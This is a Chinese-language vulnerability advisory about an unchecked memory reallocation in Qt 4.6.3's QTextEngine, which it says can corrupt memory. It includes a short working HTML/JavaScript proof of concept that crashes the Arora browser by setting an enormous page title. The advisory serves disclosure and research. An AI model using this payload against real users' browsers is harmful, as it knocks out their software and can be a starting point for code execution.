发布日期：2010-07-13
更新日期：2010-07-26

受影响系统：

Nokia Qt <= 4.6.3

描述：

---

BUGTRAQ  ID: 41873

Qt是一个跨平台应用程序框架，允许一次性开发应用程序和用户界面，然后将其部署到多个桌面和嵌入式操作系统。

Qt的src/gui/text/qtextengine.cpp文件中的QTextEngine::LayoutData::reallocate()函数没有正确地检查内存重新分配的返回值，用户受骗访问了恶意网站就可能触发内存破坏，导致执行任意代码。成功攻击要求Qt编译了QT_NO_EXCEPTIONS（-no-exceptions）设置。

<*来源：D4rk357
  
  链接：http://secunia.com/advisories/40588/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<head>
<title>Arora browser Remote Denial fo Service </title>
<body bgcolor="black">

<script type="text/javascript">
function garbage() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2>==> <a href="javascript:garbage();">CLICK HERE</a></font> <==</h2>
</body>
</html>

建议：

---

厂商补丁：

Nokia
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.nokia.com

浏览次数：2592
严重程度：0（网友投票）